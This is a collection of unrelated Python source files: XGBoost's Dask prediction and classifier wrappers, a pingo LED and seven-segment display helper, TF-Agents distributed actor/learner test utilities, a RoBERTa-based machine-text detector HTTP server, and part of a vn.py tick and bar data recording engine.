list_of_workers = [list(worker_map.keys())[wid]]
f = await client.submit(func, wid,
pure=False,
workers=list_of_workers)
futures.append(f)
# Get delayed objects
results = await client.gather(futures)
results = [t for l in results for t in l] # flatten into 1 dim list
# sort by order, l[0] is the delayed object, l[1] is its order
results = sorted(results, key=lambda l: l[1])
results = [predt for predt, order in results] # remove order
return results
results = await map_function(dispatched_predict)
shapes = await map_function(dispatched_get_shape)
# Constructing a dask array from list of numpy arrays
# See https://docs.dask.org/en/latest/array-creation.html
arrays = []
for i, shape in enumerate(shapes):
arrays.append(da.from_delayed(
results[i][0], shape=(shape[0],)
if results[i][1] == 1 else (shape[0], results[i][1]),
dtype=numpy.float32))
predictions = await da.concatenate(arrays, axis=0)
return predictions
def predict(client, model, data, *args, missing=numpy.nan):
'''Run prediction with a trained booster.
.. note::
Only default prediction mode is supported right now.
.. versionadded:: 1.0.0
Parameters
----------
client: dask.distributed.Client
Specify the dask client used for training. Use default client
returned from dask if it's set to None.
model: A Booster or a dictionary returned by `xgboost.dask.train`.
The trained model.
data: DaskDMatrix/dask.dataframe.DataFrame/dask.array.Array
Input data used for prediction.
missing: float
Used when input data is not DaskDMatrix. Specify the value
considered as missing.
Returns
-------
prediction: dask.array.Array/dask.dataframe.Series
'''
_assert_dask_support()
client = _xgb_get_client(client)
return client.sync(_predict_async, client, model, data, *args,
missing=missing)
async def _inplace_predict_async(client, model, data,
iteration_range=(0, 0),
predict_type='value',
missing=numpy.nan):
client = _xgb_get_client(client)
if isinstance(model, Booster):
booster = model
elif isinstance(model, dict):
booster = model['booster']
else:
raise TypeError(_expect([Booster, dict], type(model)))
if not isinstance(data, (da.Array, dd.DataFrame)):
raise TypeError(_expect([da.Array, dd.DataFrame], type(data)))
def mapped_predict(data, is_df):
worker = distributed_get_worker()
booster.set_param({'nthread': worker.nthreads})
prediction = booster.inplace_predict(
data,
iteration_range=iteration_range,
predict_type=predict_type,
missing=missing)
if is_df:
if lazy_isinstance(data, 'cudf.core.dataframe', 'DataFrame'):
import cudf # pylint: disable=import-error
prediction = cudf.DataFrame({'prediction': prediction},
dtype=numpy.float32)
else:
# If it's from pandas, the partition is a numpy array
prediction = DataFrame(prediction, columns=['prediction'],
dtype=numpy.float32)
return prediction
return await _direct_predict_impl(client, data, mapped_predict)
def inplace_predict(client, model, data,
iteration_range=(0, 0),
predict_type='value',
missing=numpy.nan):
'''Inplace prediction.
.. versionadded:: 1.1.0
Parameters
----------
client: dask.distributed.Client
Specify the dask client used for training. Use default client
returned from dask if it's set to None.
model: Booster/dict
The trained model.
iteration_range: tuple
Specify the range of trees used for prediction.
predict_type: str
* 'value': Normal prediction result.
* 'margin': Output the raw untransformed margin value.
missing: float
Value in the input data which needs to be present as a missing
value. If None, defaults to np.nan.
Returns
-------
prediction: dask.array.Array
'''
_assert_dask_support()
client = _xgb_get_client(client)
return client.sync(_inplace_predict_async, client, model=model, data=data,
iteration_range=iteration_range,
predict_type=predict_type,
missing=missing)
async def _evaluation_matrices(client, validation_set,
sample_weights, missing):
'''
Parameters
----------
validation_set: list of tuples
Each tuple contains a validation dataset including input X and label y.
E.g.:
.. code-block:: python
[(X_0, y_0), (X_1, y_1), ... ]
sample_weights: list of arrays
The weight vector for validation data.
Returns
-------
evals: list of validation DMatrix
'''
evals = []
if validation_set is not None:
assert isinstance(validation_set, list)
for i, e in enumerate(validation_set):
w = (sample_weights[i]
if sample_weights is not None else None)
dmat = await DaskDMatrix(client=client, data=e[0], label=e[1],
weight=w, missing=missing)
evals.append((dmat, 'validation_{}'.format(i)))
else:
evals = None
return evals
class DaskScikitLearnBase(XGBModel):
'''Base class for implementing scikit-learn interface with Dask'''
_client = None
# pylint: disable=arguments-differ
def fit(self, X, y,
sample_weights=None,
eval_set=None,
sample_weight_eval_set=None,
verbose=True):
'''Fit the regressor.
Parameters
----------
X : array_like
Feature matrix
y : array_like
Labels
sample_weight : array_like
instance weights
eval_set : list, optional
A list of (X, y) tuple pairs to use as validation sets, for which
metrics will be computed.
Validation metrics will help us track the performance of the model.
sample_weight_eval_set : list, optional
A list of the form [L_1, L_2, ..., L_n], where each L_i is a list
of group weights on the i-th validation set.
verbose : bool
If `verbose` and an evaluation set is used, writes the evaluation
metric measured on the validation set to stderr.'''
raise NotImplementedError
def predict(self, data): # pylint: disable=arguments-differ
'''Predict with `data`.
Parameters
----------
data: data that can be used to construct a DaskDMatrix
Returns
-------
prediction : dask.array.Array'''
raise NotImplementedError
def __await__(self):
# Generate a coroutine wrapper to make this class awaitable.
async def _():
return self
return self.client.sync(_).__await__()
@property
def client(self):
'''The dask client used in this model.'''
client = _xgb_get_client(self._client)
return client
@client.setter
def client(self, clt):
self._client = clt
@xgboost_model_doc("""Implementation of the Scikit-Learn API for XGBoost.""",
['estimators', 'model'])
class DaskXGBRegressor(DaskScikitLearnBase, XGBRegressorBase):
# pylint: disable=missing-class-docstring
async def _fit_async(self,
X,
y,
sample_weights=None,
eval_set=None,
sample_weight_eval_set=None,
verbose=True):
dtrain = await DaskDMatrix(client=self.client,
data=X, label=y, weight=sample_weights,
missing=self.missing)
params = self.get_xgb_params()
evals = await _evaluation_matrices(self.client,
eval_set, sample_weight_eval_set,
self.missing)
results = await train(client=self.client, params=params, dtrain=dtrain,
num_boost_round=self.get_num_boosting_rounds(),
evals=evals, verbose_eval=verbose)
self._Booster = results['booster']
# pylint: disable=attribute-defined-outside-init
self.evals_result_ = results['history']
return self
# pylint: disable=missing-docstring
def fit(self, X, y,
sample_weights=None,
eval_set=None,
sample_weight_eval_set=None,
verbose=True):
_assert_dask_support()
return self.client.sync(self._fit_async, X, y, sample_weights,
eval_set, sample_weight_eval_set,
verbose)
async def _predict_async(self, data): # pylint: disable=arguments-differ
test_dmatrix = await DaskDMatrix(client=self.client, data=data,
missing=self.missing)
pred_probs = await predict(client=self.client,
model=self.get_booster(), data=test_dmatrix)
return pred_probs
def predict(self, data):
_assert_dask_support()
return self.client.sync(self._predict_async, data)
@xgboost_model_doc(
'Implementation of the scikit-learn API for XGBoost classification.',
['estimators', 'model']
)
class DaskXGBClassifier(DaskScikitLearnBase, XGBClassifierBase):
async def _fit_async(self, X, y,
sample_weights=None,
eval_set=None,
sample_weight_eval_set=None,
verbose=True):
dtrain = await DaskDMatrix(client=self.client,
data=X, label=y, weight=sample_weights,
missing=self.missing)
params = self.get_xgb_params()
# pylint: disable=attribute-defined-outside-init
if isinstance(y, (da.Array)):
self.classes_ = await self.client.compute(da.unique(y))
else:
self.classes_ = await self.client.compute(y.drop_duplicates())
self.n_classes_ = len(self.classes_)
if self.n_classes_ > 2:
params["objective"] = "multi:softprob"
params['num_class'] = self.n_classes_
else:
params["objective"] = "binary:logistic"
evals = await _evaluation_matrices(self.client,
eval_set, sample_weight_eval_set,
self.missing)
results = await train(client=self.client, params=params, dtrain=dtrain,
num_boost_round=self.get_num_boosting_rounds(),
evals=evals, verbose_eval=verbose)
self._Booster = results['booster']
# pylint: disable=attribute-defined-outside-init
self.evals_result_ = results['history']
return self
def fit(self, X, y,
sample_weights=None,
eval_set=None,
sample_weight_eval_set=None,
verbose=True):
_assert_dask_support()
return self.client.sync(self._fit_async, X, y, sample_weights,
eval_set, sample_weight_eval_set, verbose)
async def _predict_proba_async(self, data):
_assert_dask_support()
test_dmatrix = await DaskDMatrix(client=self.client, data=data,
missing=self.missing)
pred_probs = await predict(client=self.client,
model=self.get_booster(), data=test_dmatrix)
return pred_probs
def predict_proba(self, data): # pylint: disable=arguments-differ,missing-docstring
_assert_dask_support()
return self.client.sync(self._predict_proba_async, data)
async def _predict_async(self, data):
_assert_dask_support()
test_dmatrix = await DaskDMatrix(client=self.client, data=data,
missing=self.missing)
pred_probs = await predict(client=self.client,
model=self.get_booster(), data=test_dmatrix)
if self.n_classes_ == 2:
preds = (pred_probs > 0.5).astype(int)
else:
preds = da.argmax(pred_probs, axis=1)
return preds
def predict(self, data): # pylint: disable=arguments-differ
_assert_dask_support()
return self.client.sync(self._predict_async, data)
|
led.py
|
import pingo
import time
import threading
class Led(object):
"""A single LED"""
def __init__(self, pin, lit_state=pingo.HIGH):
"""Set lit_state to pingo.LOW to turn on led by bringing
cathode to low state.
:param lit_state: use pingo.HI for anode control, pingo.LOW
for cathode control
"""
pin.mode = pingo.OUT
self.pin = pin
self.lit_state = lit_state
self.blink_task = None
def on(self):
if self.lit_state == pingo.HIGH:
self.pin.high()
else:
self.pin.low()
def off(self):
if self.lit_state == pingo.HIGH:
self.pin.low()
else:
self.pin.high()
@property
def lit(self):
return self.pin.state == self.lit_state
@lit.setter
def lit(self, new_state):
if new_state:
self.on()
else:
self.off()
@property
def blinking(self):
return self.blink_task is not None and self.blink_task.active
def toggle(self):
self.pin.toggle()
def blink(self, times=3, on_delay=.5, off_delay=None):
"""
:param times: number of times to blink (0=forever)
:param on_delay: delay while LED is on
:param off_delay: delay while LED is off
"""
if self.blinking:
self.stop()
self.blink_task = BlinkTask(self, times, on_delay, off_delay)
threading.Thread(target=self.blink_task.run).start()
def stop(self):
"""Stop blinking"""
if self.blinking:
self.blink_task.terminate()
self.blink_task = None
PURE_COLORS = [
('RED', [1, 0, 0]),
('YELLOW', [1, 1, 0]),
('GREEN', [0, 1, 0]),
('CYAN', [0, 1, 1]),
('BLUE', [0, 0, 1]),
('PURPLE', [1, 0, 1]),
('WHITE', [1, 1, 1]),
('BLACK', [0, 0, 0]),
]
class RGBLed(object):
pure_colors_map = dict(PURE_COLORS)
def __init__(self, red_pin, green_pin, blue_pin,
lit_state=pingo.LOW):
self._leds = [Led(red_pin, lit_state), Led(green_pin, lit_state),
Led(blue_pin, lit_state)]
self.color = 'BLACK'
@property
def color(self):
return self._color
@color.setter
def color(self, new_color):
new_color = new_color.upper()
if new_color in RGBLed.pure_colors_map:
self._color = new_color
states = RGBLed.pure_colors_map[new_color]
for led, state in zip(self._leds, states):
led.lit = state
else:
raise ValueError('Unknown color %s', new_color)
def cycle(self, delay=.15):
colors = PURE_COLORS[:6] # exclude white and black
for color, _ in colors:
self.color = color
time.sleep(delay)
class BlinkTask(object):
def __init__(self, led, times, on_delay, off_delay):
"""
:param led: Led instance to to blink
:param times: number of times to blink (0=forever)
:param on_delay: delay while LED is on
:param off_delay: delay while LED is off
"""
self.led = led
self.led_pin_state_initial = self.led.pin.state
self.active = True
self.forever = times == 0
self.times_remaining = times
self.on_delay = on_delay
self.off_delay = off_delay if off_delay is not None else on_delay
self.led.off()
def terminate(self):
self.active = False
def run(self):
while self.active and (self.forever or self.times_remaining):
self.led.toggle()
if self.led.lit:
time.sleep(self.on_delay)
if not self.forever:
self.times_remaining -= 1
else:
time.sleep(self.off_delay)
else:
self.led.pin.state = self.led_pin_state_initial
self.active = False
DIGIT_MAP = {
0: '1111110',
1: '0110000',
2: '1101101',
3: '1111001',
4: '0110011',
5: '1011011',
6: '1011111',
7: '1110000',
8: '1111111',
9: '1111011',
10: '1110111',
11: '0011111',
12: '1001110',
13: '0111101',
14: '1001111',
15: '1000111',
'G': '1011110', # to spell GAr0A
'r': '0000101', # to spell GAr0A
}
class SevenSegments(object):
def __init__(self, pin_a, pin_b, pin_c, pin_d,
pin_e, pin_f, pin_g, pin_dp=None,
lit_state=pingo.HIGH):
self._leds = [Led(pin_a, lit_state), Led(pin_b, lit_state),
Led(pin_c, lit_state), Led(pin_d, lit_state),
Led(pin_e, lit_state), Led(pin_f, lit_state),
Led(pin_g, lit_state)]
if pin_dp:
self._leds.append(Led(pin_dp, lit_state))
self._digit = 0
self._dot = False
def _configure(self, pattern):
for segment, state in zip(self._leds, pattern):
segment.lit = state == '1'
@property
def digit(self):
return self._digit
@digit.setter
def digit(self, digit):
self._digit = digit
pattern = DIGIT_MAP[digit]
self._configure(pattern)
def on(self):
self.digit = self._digit
def off(self):
self._configure('0' * 7)
@property
def dot(self):
return self._dot
@dot.setter
def dot(self, state):
if len(self._leds) < 8:
raise LookupError('Decimal point LED undefined')
if state:
self._dot = True
self._leds[7].on()
else:
self._dot = False
self._leds[7].off()
|
test_utils.py
|
# coding=utf-8
# Copyright 2018 The TF-Agents Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Utils for running distributed actor/learner tests."""
import functools
from absl import logging
import numpy as np
import reverb
import tensorflow.compat.v2 as tf # pylint: disable=g-explicit-tensorflow-version-import
from tf_agents.agents.dqn import dqn_agent
from tf_agents.agents.ppo import ppo_clip_agent
from tf_agents.environments import suite_gym
from tf_agents.experimental.distributed import reverb_variable_container
from tf_agents.experimental.train import actor
from tf_agents.experimental.train.utils import replay_buffer_utils
from tf_agents.experimental.train.utils import spec_utils
from tf_agents.experimental.train.utils import train_utils
from tf_agents.networks import actor_distribution_network
from tf_agents.networks import sequential
from tf_agents.networks import value_network
from tf_agents.policies import py_tf_eager_policy
from tf_agents.replay_buffers import reverb_replay_buffer
from tf_agents.specs import tensor_spec
from tf_agents.trajectories import time_step as ts
from tf_agents.trajectories import trajectory
def configure_logical_cpus():
"""Configures exactly 4 logical CPUs for the first physical CPU.
Assumes no logical configuration exists or it was configured the same way.
**Note**: The reason why the number of logical CPUs fixed is because
reconfiguring the number of logical CPUs once the underlying runtime has been
initialized is not supported (raises `RuntimeError`). So, with this choice it
is ensured that tests running in the same process calling this function
multiple times do not break.
"""
first_cpu = tf.config.list_physical_devices('CPU')[0]
try:
logical_devices = [
tf.config.experimental.VirtualDeviceConfiguration() for _ in range(4)
]
tf.config.experimental.set_virtual_device_configuration(
first_cpu, logical_devices=logical_devices)
logging.info(
'No current virtual device configuration. Defining 4 virtual CPUs on '
'the first physical one.')
except RuntimeError:
current_config = tf.config.experimental.get_virtual_device_configuration(
first_cpu)
logging.warn(
'The following virtual device configuration already exists: %s which '
'resulted this call to fail with `RuntimeError` since it is not '
'possible to reconfigure it after runtime initialization. It is '
'probably safe to ignore.', current_config)
def get_cartpole_env_and_specs():
env = suite_gym.load('CartPole-v0')
_, action_tensor_spec, time_step_tensor_spec = (
spec_utils.get_tensor_specs(env))
return env, action_tensor_spec, time_step_tensor_spec
def build_dummy_sequential_net(fc_layer_params, action_spec):
"""Build a dummy sequential network."""
num_actions = action_spec.maximum - action_spec.minimum + 1
logits = functools.partial(
tf.keras.layers.Dense,
activation=None,
kernel_initializer=tf.random_uniform_initializer(
minval=-0.03, maxval=0.03),
bias_initializer=tf.constant_initializer(-0.2))
dense = functools.partial(
tf.keras.layers.Dense,
activation=tf.keras.activations.relu,
kernel_initializer=tf.compat.v1.variance_scaling_initializer(
scale=2.0, mode='fan_in', distribution='truncated_normal'))
return sequential.Sequential(
[dense(num_units) for num_units in fc_layer_params]
+ [logits(num_actions)])
def create_ppo_agent_and_dataset_fn(action_spec, time_step_spec, train_step,
batch_size):
"""Builds and returns a dummy PPO Agent, dataset and dataset function."""
del action_spec # Unused.
del time_step_spec # Unused.
del batch_size # Unused.
# No arbitrary spec supported.
obs_spec = tensor_spec.TensorSpec([2], tf.float32)
ts_spec = ts.time_step_spec(obs_spec)
act_spec = tensor_spec.BoundedTensorSpec([1], tf.float32, -1, 1)
actor_net = actor_distribution_network.ActorDistributionNetwork(
obs_spec,
act_spec,
fc_layer_params=(100,),
activation_fn=tf.keras.activations.tanh)
value_net = value_network.ValueNetwork(
obs_spec, fc_layer_params=(100,), activation_fn=tf.keras.activations.tanh)
agent = ppo_clip_agent.PPOClipAgent(
ts_spec,
act_spec,
optimizer=tf.keras.optimizers.Adam(learning_rate=0.001),
actor_net=actor_net,
value_net=value_net,
entropy_regularization=0.0,
importance_ratio_clipping=0.2,
normalize_observations=False,
normalize_rewards=False,
use_gae=False,
use_td_lambda_return=False,
num_epochs=1,
debug_summaries=False,
summarize_grads_and_vars=False,
train_step_counter=train_step,
compute_value_and_advantage_in_train=False)
def _create_experience(_):
observations = tf.constant([
[[1, 2], [3, 4], [5, 6]],
[[1, 2], [3, 4], [5, 6]],
],
dtype=tf.float32)
mid_time_step_val = ts.StepType.MID.tolist()
time_steps = ts.TimeStep(
step_type=tf.constant([[mid_time_step_val] * 3] * 2, dtype=tf.int32),
reward=tf.constant([[1] * 3] * 2, dtype=tf.float32),
discount=tf.constant([[1] * 3] * 2, dtype=tf.float32),
observation=observations)
actions = tf.constant([[[0], [1], [1]], [[0], [1], [1]]], dtype=tf.float32)
action_distribution_parameters = {
'loc': tf.constant([[[0.0]] * 3] * 2, dtype=tf.float32),
'scale': tf.constant([[[1.0]] * 3] * 2, dtype=tf.float32),
}
value_preds = tf.constant([[9., 15., 21.], [9., 15., 21.]],
dtype=tf.float32)
policy_info = {
'dist_params': action_distribution_parameters,
}
policy_info['value_prediction'] = value_preds
experience = trajectory.Trajectory(time_steps.step_type, observations,
actions, policy_info,
time_steps.step_type, time_steps.reward,
time_steps.discount)
return agent._preprocess(experience) # pylint: disable=protected-access
dataset = tf.data.Dataset.from_tensor_slices([[i] for i in range(100)
]).map(_create_experience)
dataset = tf.data.Dataset.zip((dataset, tf.data.experimental.Counter()))
dataset_fn = lambda: dataset
return agent, dataset, dataset_fn, agent.training_data_spec
def create_dqn_agent_and_dataset_fn(action_spec, time_step_spec, train_step,
batch_size):
"""Builds and returns a dataset function for DQN Agent."""
q_net = build_dummy_sequential_net(fc_layer_params=(100,),
action_spec=action_spec)
agent = dqn_agent.DqnAgent(
time_step_spec,
action_spec,
q_network=q_net,
optimizer=tf.keras.optimizers.Adam(learning_rate=0.001),
train_step_counter=train_step)
agent.initialize()
def make_item(_):
traj = tensor_spec.sample_spec_nest(
agent.collect_data_spec, seed=123, outer_dims=[2])
def scale_observation_only(item):
# Scale float values in the sampled item by large value to avoid NaNs.
if item.dtype == tf.float32:
return tf.math.divide(item, 1.e+22)
else:
return item
return tf.nest.map_structure(scale_observation_only, traj)
l = []
for i in range(100):
l.append([i])
dataset = tf.data.Dataset.zip(
(tf.data.Dataset.from_tensor_slices(l).map(make_item),
tf.data.experimental.Counter()))
dataset_fn = lambda: dataset.batch(batch_size)
return agent, dataset, dataset_fn, agent.collect_data_spec
def build_actor(root_dir, env, agent, rb_observer, train_step):
"""Builds the Actor."""
tf_collect_policy = agent.collect_policy
collect_policy = py_tf_eager_policy.PyTFEagerPolicy(
tf_collect_policy, use_tf_function=True)
temp_dir = root_dir + 'actor'
test_actor = actor.Actor(
env,
collect_policy,
train_step,
steps_per_run=1,
metrics=actor.collect_metrics(10),
summary_dir=temp_dir,
observers=[rb_observer])
return test_actor
def get_actor_thread(test_case, reverb_server_port, num_iterations=10):
"""Returns a thread that runs an Actor."""
def build_and_run_actor():
root_dir = test_case.create_tempdir().full_path
env, action_tensor_spec, time_step_tensor_spec = (
get_cartpole_env_and_specs())
train_step = train_utils.create_train_step()
q_net = build_dummy_sequential_net(fc_layer_params=(100,),
action_spec=action_tensor_spec)
agent = dqn_agent.DqnAgent(
time_step_tensor_spec,
action_tensor_spec,
q_network=q_net,
optimizer=tf.keras.optimizers.Adam(learning_rate=0.001),
train_step_counter=train_step)
_, rb_observer = (
replay_buffer_utils.get_reverb_buffer_and_observer(
agent.collect_data_spec,
table_name=reverb_replay_buffer.DEFAULT_TABLE,
sequence_length=2,
reverb_server_address='localhost:{}'.format(reverb_server_port)))
variable_container = reverb_variable_container.ReverbVariableContainer(
server_address='localhost:{}'.format(reverb_server_port),
table_names=[reverb_variable_container.DEFAULT_TABLE])
test_actor = build_actor(
root_dir, env, agent, rb_observer, train_step)
variables_dict = {
reverb_variable_container.POLICY_KEY: agent.collect_policy.variables(),
reverb_variable_container.TRAIN_STEP_KEY: train_step
}
variable_container.update(variables_dict)
for _ in range(num_iterations):
test_actor.run()
actor_thread = test_case.checkedThread(target=build_and_run_actor)
return actor_thread
def check_variables_different(test_case, old_vars_numpy, new_vars_numpy):
"""Tests whether the two sets of variables are different.
Useful for checking if variables were updated, i.e. a train step was run.
Args:
test_case: an instande of tf.test.TestCase for assertions
old_vars_numpy: numpy representation of old variables
new_vars_numpy: numpy representation of new variables
"""
# Check if there is a change.
def changed(a, b):
return not np.equal(a, b).all()
vars_changed = tf.nest.flatten(
tf.nest.map_structure(changed, old_vars_numpy, new_vars_numpy))
# Assert if any of the variable changed.
test_case.assertTrue(np.any(vars_changed))
def create_reverb_server_for_replay_buffer_and_variable_container(
collect_policy, train_step, replay_buffer_capacity, port):
"""Sets up one reverb server for replay buffer and variable container."""
# Create the signature for the variable container holding the policy weights.
variables = {
reverb_variable_container.POLICY_KEY: collect_policy.variables(),
reverb_variable_container.TRAIN_STEP_KEY: train_step
}
variable_container_signature = tf.nest.map_structure(
lambda variable: tf.TensorSpec(variable.shape, dtype=variable.dtype),
variables)
# Create the signature for the replay buffer holding observed experience.
replay_buffer_signature = tensor_spec.from_spec(
collect_policy.collect_data_spec)
# Crete and start the replay buffer and variable container server.
server = reverb.Server(
tables=[
reverb.Table( # Replay buffer storing experience.
name=reverb_replay_buffer.DEFAULT_TABLE,
sampler=reverb.selectors.Uniform(),
remover=reverb.selectors.Fifo(),
# TODO(b/159073060): Set rate limiter for SAC properly.
rate_limiter=reverb.rate_limiters.MinSize(1),
max_size=replay_buffer_capacity,
max_times_sampled=0,
signature=replay_buffer_signature,
),
reverb.Table( # Variable container storing policy parameters.
name=reverb_variable_container.DEFAULT_TABLE,
sampler=reverb.selectors.Uniform(),
remover=reverb.selectors.Fifo(),
rate_limiter=reverb.rate_limiters.MinSize(1),
max_size=1,
max_times_sampled=0,
signature=variable_container_signature,
),
],
port=port)
return server
|
server.py
|
import json
import os
import subprocess
import sys
from http.server import HTTPServer, SimpleHTTPRequestHandler
from multiprocessing import Process
from urllib.parse import unquote, urlparse
import fire
import torch
from transformers import RobertaForSequenceClassification, RobertaTokenizer
model: RobertaForSequenceClassification = None
tokenizer: RobertaTokenizer = None
device: str = None
def log(*args):
print(f"[{os.environ.get('RANK', '')}]", *args, file=sys.stderr)
class RequestHandler(SimpleHTTPRequestHandler):
def do_GET(self):
query = unquote(urlparse(self.path).query)
if not query:
self.begin_content('text/html')
html = os.path.join(os.path.dirname(__file__), 'index.html')
self.wfile.write(open(html).read().encode())
return
self.begin_content('application/json;charset=UTF-8')
tokens = tokenizer.encode(query)
all_tokens = len(tokens)
tokens = tokens[:tokenizer.max_len - 2]
used_tokens = len(tokens)
tokens = torch.tensor([tokenizer.bos_token_id] + tokens + [tokenizer.eos_token_id]).unsqueeze(0)
mask = torch.ones_like(tokens)
with torch.no_grad():
logits = model(tokens.to(device), attention_mask=mask.to(device))[0]
probs = logits.softmax(dim=-1)
fake, real = probs.detach().cpu().flatten().numpy().tolist()
self.wfile.write(json.dumps(dict(
all_tokens=all_tokens,
used_tokens=used_tokens,
real_probability=real,
fake_probability=fake
)).encode())
def begin_content(self, content_type):
self.send_response(200)
self.send_header('Content-Type', content_type)
self.send_header('Access-Control-Allow-Origin', '*')
self.end_headers()
def log_message(self, format, *args):
log(format % args)
def serve_forever(server, model, tokenizer, device):
log('Process has started; loading the model ...')
globals()['model'] = model.to(device)
globals()['tokenizer'] = tokenizer
globals()['device'] = device
log(f'Ready to serve at http://localhost:{server.server_address[1]}')
server.serve_forever()
def main(checkpoint, port=8080, device='cuda' if torch.cuda.is_available() else 'cpu'):
if checkpoint.startswith('gs://'):
print(f'Downloading {checkpoint}', file=sys.stderr)
subprocess.check_output(['gsutil', 'cp', checkpoint, '.'])
checkpoint = os.path.basename(checkpoint)
assert os.path.isfile(checkpoint)
print(f'Loading checkpoint from {checkpoint}')
data = torch.load(checkpoint, map_location='cpu')
model_name = 'roberta-large' if data['args']['large'] else 'roberta-base'
model = RobertaForSequenceClassification.from_pretrained(model_name)
tokenizer = RobertaTokenizer.from_pretrained(model_name)
model.load_state_dict(data['model_state_dict'])
model.eval()
print(f'Starting HTTP server on port {port}', file=sys.stderr)
server = HTTPServer(('0.0.0.0', port), RequestHandler)
# avoid calling CUDA API before forking; doing so in a subprocess is fine.
# print(subprocess.check_output([sys.executable, '-c', 'import torch; print(torch.cuda.device_count())']))
# num_workers = int(subprocess.check_output([sys.executable, '-c', 'import torch; print(torch.cuda.device_count())']))
num_workers = 0
if num_workers <= 1:
serve_forever(server, model, tokenizer, device)
else:
print(f'Launching {num_workers} worker processes...')
subprocesses = []
for i in range(num_workers):
os.environ['RANK'] = f'{i}'
os.environ['CUDA_VISIBLE_DEVICES'] = f'{i}'
process = Process(target=serve_forever, args=(server, model, tokenizer, device))
process.start()
subprocesses.append(process)
del os.environ['RANK']
del os.environ['CUDA_VISIBLE_DEVICES']
for process in subprocesses:
process.join()
if __name__ == '__main__':
fire.Fire(main)
|
drEngine.py
|
# encoding: UTF-8
'''
本文件中实现了行情数据记录引擎,用于汇总TICK数据,并生成K线插入数据库。
使用DR_setting.json来配置需要收集的合约,以及主力合约代码。
'''
import json
import os
import copy
from collections import OrderedDict
from datetime import datetime, timedelta
from Queue import Queue
from threading import Thread
from eventEngine import *
from vtGateway import VtSubscribeReq, VtLogData
from drBase import *
from vtFunction import todayDate
########################################################################
class DrEngine(object):
"""数据记录引擎"""
settingFileName = 'DR_setting.json'
path = os.path.abspath(os.path.dirname(__file__))
settingFileName = os.path.join(path, settingFileName)
#----------------------------------------------------------------------
def __init__(self, mainEngine, eventEngine):
"""Constructor"""
self.mainEngine = mainEngine
self.eventEngine = eventEngine
# 当前日期
self.today = todayDate()
# 主力合约代码映射字典,key为具体的合约代码(如IF1604),value为主力合约代码(如IF0000)
self.activeSymbolDict = {}
# Tick对象字典
self.tickDict = {}
# K线对象字典
self.barDict = {}
# 负责执行数据库插入的单独线程相关
self.active = False # 工作状态
self.queue = Queue() # 队列
self.thread = Thread(target=self.run) # 线程
# 载入设置,订阅行情
self.loadSetting()
#----------------------------------------------------------------------
def loadSetting(self):
"""载入设置"""
with open(self.settingFileName) as f:
drSetting = json.load(f)
# 如果working设为False则不启动行情记录功能
working = drSetting['working']
if not working:
return
if 'tick' in drSetting:
l = drSetting['tick']
for setting in l:
symbol = setting[0]
vtSymbol = symbol
req = VtSubscribeReq()
req.symbol = setting[0]
# 针对LTS和IB接口,订阅行情需要交易所代码
if len(setting)>=3:
req.exchange = setting[2]
vtSymbol = '.'.join([symbol, req.exchange])
# 针对IB接口,订阅行情需要货币和产品类型
if len(setting)>=5:
req.currency = setting[3]
req.productClass = setting[4]
self.mainEngine.subscribe(req, setting[1])
drTick = DrTickData() # 该tick实例可以用于缓存部分数据(目前未使用)
self.tickDict[vtSymbol] = drTick
if 'bar' in drSetting:
l = drSetting['bar']
for setting in l:
symbol = setting[0]
vtSymbol = symbol
req = VtSubscribeReq()
req.symbol = symbol
if len(setting)>=3:
req.exchange = setting[2]
vtSymbol = '.'.join([symbol, req.exchange])
if len(setting)>=5:
req.currency = setting[3]
req.productClass = setting[4]
self.mainEngine.subscribe(req, setting[1])
bar = DrBarData()
self.barDict[vtSymbol] = bar
if 'active' in drSetting:
d = drSetting['active']
# 注意这里的vtSymbol对于IB和LTS接口,应该后缀.交易所
for activeSymbol, vtSymbol in d.items():
self.activeSymbolDict[vtSymbol] = activeSymbol
# 启动数据插入线程
self.start()
# 注册事件监听
self.registerEvent()
#----------------------------------------------------------------------
def procecssTickEvent(self, event):
"""处理行情推送"""
tick = event.dict_['data']
vtSymbol = tick.vtSymbol
# 转化Tick格式
drTick = DrTickData()
d = drTick.__dict__
for key in d.keys():
if key != 'datetime':
d[key] = tick.__getattribute__(key)
drTick.datetime = datetime.strptime(' '.join([tick.date, tick.time]), '%Y%m%d %H:%M:%S.%f')
# 更新Tick数据
if vtSymbol in self.tickDict:
self.insertData(TICK_DB_NAME, vtSymbol, drTick)
if vtSymbol in self.activeSymbolDict:
activeSymbol = self.activeSymbolDict[vtSymbol]
self.insertData(TICK_DB_NAME, activeSymbol, drTick)
# 发出日志
self.writeDrLog(u'记录Tick数据%s,时间:%s, last:%s, bid:%s, ask:%s'
%(drTick.vtSymbol, drTick.time, drTick.lastPrice, drTick.bidPrice1, drTick.askPrice1))
# 更新分钟线数据
if vtSymbol in self.barDict:
bar = self.barDict[vtSymbol]
# 如果第一个TICK或者新的一分钟
if not bar.datetime or bar.datetime.minute != drTick.datetime.minute:
if bar.vtSymbol:
newBar = copy.copy(bar)
self.insertData(MINUTE_DB_NAME, vtSymbol, newBar)
if vtSymbol in self.activeSymbolDict:
activeSymbol = self.activeSymbolDict[vtSymbol]
self.insertData(MINUTE_DB_NAME, activeSymbol, newBar)
self.writeDrLog(u'记录分钟线数据%s,时间:%s, O:%s, H:%s, L:%s, C:%s'
%(bar.vtSymbol, bar.time, bar.open, bar.high,
bar.low, bar.close))
bar.vtSymbol = drTick.vtSymbol
bar.symbol = drTick.symbol
bar.exchange = drTick.exchange
bar.open = drTick.lastPrice
bar.high = drTick.lastPrice
bar.low = drTick.lastPrice
bar.close = drTick.lastPrice
bar.date = drTick.date
bar.time = drTick.time
bar.datetime = drTick.datetime
bar.volume = drTick.volume
bar.openInterest = drTick.openInterest
# 否则继续累加新的K线
else:
bar.high = max(bar.high, drTick.lastPrice)
bar.low = min(bar.low, drTick.lastPrice)
bar.close = drTick.lastPrice
#----------------------------------------------------------------------
def registerEvent(self):
"""注册事件监听"""
self.eventEngine.register(EVENT_TICK, self.procecssTickEvent)
#----------------------------------------------------------------------
def insertData(self, dbName, collectionName, data):
"""插入数据到数据库(这里的data可以是CtaTickData或者CtaBarData)"""
self.queue.put((dbName, collectionName, data.__dict__))
#----------------------------------------------------------------------
